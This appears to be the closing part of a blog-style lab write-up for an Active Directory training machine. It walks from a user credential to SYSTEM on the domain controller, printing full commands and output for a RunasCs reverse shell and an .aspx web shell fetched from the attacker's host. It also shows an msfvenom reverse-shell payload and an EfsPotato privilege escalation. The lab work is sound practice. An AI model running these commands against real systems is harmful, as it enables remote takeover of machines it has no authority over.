┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u web_admin -p 'Password123'
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\web_admin:Password123 However, there was still a big issue. Although I had the password for it, I couldn’t remotely connect to that user because it was lacking the proper group memberships. I started a netcat listener, then uploaded RunasCs.exe in C:\Temp from the terminal I had as sam.brooks.
*Evil-WinRM* PS C:\Temp> upload RunasCs.exe Info: Uploading /home/rootshellace/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil/RunasCs.exe to C:\Temp\RunasCs.exe
Data: 68948 bytes of 68948 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Temp> dir
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/24/2025 9:08 AM 2548 dc_user_rights.inf
-a---- 11/28/2025 12:57 PM 5296 privs.inf
-a---- 6/28/2026 4:01 AM 51712 RunasCs.exe
-a---- 10/24/2025 9:08 AM 16384 secedit.jfm
-a---- 10/24/2025 9:08 AM 1048576 secedit.sdb
After that, I executed RunasCs.exe and launched a reverse shell.
*Evil-WinRM* PS C:\Temp> .\RunasCs.exe web_admin Password123 powershell.exe -r <MY_VPN_IP>:4444
[*] Warning: User profile directory for user web_admin does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'web_admin' is limited. Use the flag combination --bypass-uac and --logon-type '5' to obtain a more privileged token.[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-14f5d16$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2676 created in background.
In the terminal where I previously started the netcat listener, I got access as web_admin.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.1.65.124 50330
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.PS C:\Windows\system32> whoami
whoami
city\web_admin
PS C:\Windows\system32>
● Pivoting to defaultapppool
Once I got access as web_admin, I went to the website uploads directory to place the .aspx reverse shell (available here). Of course, in a different terminal, I started another netcat listener, to have it prepared. Using PowerShell and a local Python web server, I uploaded the required file.
PS C:\inetpub\wwwroot\uploads> dir
dir Directory: C:\inetpub\wwwroot\uploads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/24/2025 11:23 AM 1218 test.aspx
PS C:\inetpub\wwwroot\uploads> Invoke-WebRequest -Uri "http://<MY_VPN_IP>:8000/hack.aspx" -OutFile "C:\inetpub\wwwroot\uploads\hack.aspx"
Invoke-WebRequest -Uri "http://<MY_VPN_IP>:8000/hack.aspx" -OutFile "C:\inetpub\wwwroot\uploads\hack.aspx"
PS C:\inetpub\wwwroot\uploads> dir
dir
Directory: C:\inetpub\wwwroot\uploads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/28/2026 4:45 AM 15970 hack.aspx
-a---- 10/24/2025 11:23 AM 1218 test.aspx
PS C:\inetpub\wwwroot\uploads>
In my browser, I accessed the page (http://city.local/uploads/hack.aspx) and, in that way, triggered the execution of the malicious file, which granted me access.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $nc -lnvp 5555
Listening on 0.0.0.0 5555
Connection received on 10.1.65.124 50499
Spawn Shell...
Microsoft Windows [Version 10.0.17763.5936]
(c) 2018 Microsoft Corporation. All rights reserved.c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>
● Abuse privileges and get full access
The first thing I did after I got access as defaultapppool was to check which privileges were assigned to that user. It had SeImpersonatePrivilege, which was a good attacking vector.
c:\windows\system32\inetsrv>whoami /priv
whoami /privPRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
c:\windows\system32\inetsrv>
I looked for available exploits applied to that permission. Initially, I tried with PrintSpoofer.exe, but it didn’t work. Next, I uploaded and compiled EfsPotato.cs (available here), according to instructions provided by its developer.
C:\Temp>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
Microsoft (R) Visual C# Compiler version 4.7.3190.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
C:\Temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is CCCC-FB95
Directory of C:\Temp
06/28/2026 05:10 AM <DIR> .
06/28/2026 05:10 AM <DIR> ..
10/24/2025 09:08 AM 2,548 dc_user_rights.inf
06/28/2026 05:05 AM 25,441 EfsPotato.cs
06/28/2026 05:10 AM 17,920 EfsPotato.exe
06/28/2026 04:59 AM 27,136 PrintSpoofer64.exe
11/28/2025 01:57 PM 5,296 privs.inf
06/28/2026 04:01 AM 51,712 RunasCs.exe
10/24/2025 09:08 AM 16,384 secedit.jfm
10/24/2025 09:08 AM 1,048,576 secedit.sdb
06/28/2026 04:19 AM 11,076,096 winPEASx64.exe
9 File(s) 12,271,109 bytes
2 Dir(s) 34,349,150,208 bytes free
Next, I created an executable for another reverse shell, using msfvenom.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $msfvenom -p windows/x64/shell_reverse_tcp LHOST=<MY_VPN_IP> LPORT=7777 -f exe > syshack_shell.exeI uploaded it via the same connection I had as sam.brooks . I also started another netcat listener.
*Evil-WinRM* PS C:\Temp> upload syshack_shell.exe Info: Uploading /home/rootshellace/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil/syshack_shell.exe to C:\Temp\syshack_shell.exe
Data: 10240 bytes of 10240 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Temp> dir
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/24/2025 9:08 AM 2548 dc_user_rights.inf
-a---- 6/28/2026 5:05 AM 25441 EfsPotato.cs
-a---- 6/28/2026 5:10 AM 17920 EfsPotato.exe
-a---- 6/28/2026 4:59 AM 27136 PrintSpoofer64.exe
-a---- 11/28/2025 12:57 PM 5296 privs.inf
-a---- 6/28/2026 4:01 AM 51712 RunasCs.exe
-a---- 10/24/2025 9:08 AM 16384 secedit.jfm
-a---- 10/24/2025 9:08 AM 1048576 secedit.sdb
-a---- 6/28/2026 5:45 AM 7680 syshack_shell.exe
-a---- 6/28/2026 5:31 AM 14 test_user.txt
-a---- 6/28/2026 4:19 AM 11076096 winPEASx64.exe
Once uploaded, I executed EfsPotato.exe to trigger the reverse shell with elevated permissions.
C:\Temp>.\EfsPotato.exe "cmd.exe /c C:\Temp\syshack_shell.exe"
.\EfsPotato.exe "cmd.exe /c C:\Temp\syshack_shell.exe"
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net][+] Current user: IIS APPPOOL\DefaultAppPool
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=109ff80)
[+] Get Token: 860
[!] process with pid: 2068 created.
==============================
[x] EfsRpcEncryptFileSrv failed: 1818
I went back to my terminal with the listener and I saw I got System access. Finally, I went inside the Desktop directory of the Administrator account and read the root flag.
└──╼ $nc -lnvp 7777
Listening on 0.0.0.0 7777
Connection received on 10.1.65.124 50695
Microsoft Windows [Version 10.0.17763.5936]
(c) 2018 Microsoft Corporation. All rights reserved.C:\Temp>whoami
whoami
nt authority\system
C:\Temp>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is CCCC-FB95
Directory of C:\Users\Administrator\Desktop
02/27/2026 07:55 AM <DIR> .
02/27/2026 07:55 AM <DIR> ..
10/24/2025 11:53 AM 1,230 root.txt
1 File(s) 1,230 bytes
2 Dir(s) 34,347,618,304 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
<REDACTED_FLAG>
⠀⠀⠀⠀⠀⣀⣠⠤⠶⠶⣖⡛⠛⠿⠿⠯⠭⠍⠉⣉⠛⠚⠛⠲⣄⠀⠀⠀⠀⠀
⠀⠀⢀⡴⠋⠁⠀⡉⠁⢐⣒⠒⠈⠁⠀⠀⠀⠈⠁⢂⢅⡂⠀⠀⠘⣧⠀⠀⠀⠀
⠀⠀⣼⠀⠀⠀⠁⠀⠀⠀⠂⠀⠀⠀⠀⢀⣀⣤⣤⣄⡈⠈⠀⠀⠀⠘⣇⠀⠀⠀
⢠⡾⠡⠄⠀⠀⠾⠿⠿⣷⣦⣤⠀⠀⣾⣋⡤⠿⠿⠿⠿⠆⠠⢀⣀⡒⠼⢷⣄⠀
⣿⠊⠊⠶⠶⢦⣄⡄⠀⢀⣿⠀⠀⠀⠈⠁⠀⠀⠙⠳⠦⠶⠞⢋⣍⠉⢳⡄⠈⣧
⢹⣆⡂⢀⣿⠀⠀⡀⢴⣟⠁⠀⢀⣠⣘⢳⡖⠀⠀⣀⣠⡴⠞⠋⣽⠷⢠⠇⠀⣼
⠀⢻⡀⢸⣿⣷⢦⣄⣀⣈⣳⣆⣀⣀⣤⣭⣴⠚⠛⠉⣹⣧⡴⣾⠋⠀⠀⣘⡼⠃
⠀⢸⡇⢸⣷⣿⣤⣏⣉⣙⣏⣉⣹⣁⣀⣠⣼⣶⡾⠟⢻⣇⡼⠁⠀⠀⣰⠋⠀⠀
⠀⢸⡇⠸⣿⡿⣿⢿⡿⢿⣿⠿⠿⣿⠛⠉⠉⢧⠀⣠⡴⠋⠀⠀⠀⣠⠇⠀⠀⠀
⠀⢸⠀⠀⠹⢯⣽⣆⣷⣀⣻⣀⣀⣿⣄⣤⣴⠾⢛⡉⢄⡢⢔⣠⠞⠁⠀⠀⠀⠀
⠀⢸⠀⠀⠀⠢⣀⠀⠈⠉⠉⠉⠉⣉⣀⠠⣐⠦⠑⣊⡥⠞⠋⠀⠀⠀⠀⠀⠀⠀
⠀⢸⡀⠀⠁⠂⠀⠀⠀⠀⠀⠀⠒⠈⠁⣀⡤⠞⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠙⠶⢤⣤⣤⣤⣤⡤⠴⠖⠚⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
C:\Users\Administrator\Desktop>
If you got here, I want to thank you for the time you took to read my article. I hope you enjoyed it and also learned something from it. Why not take a look at some of my other articles?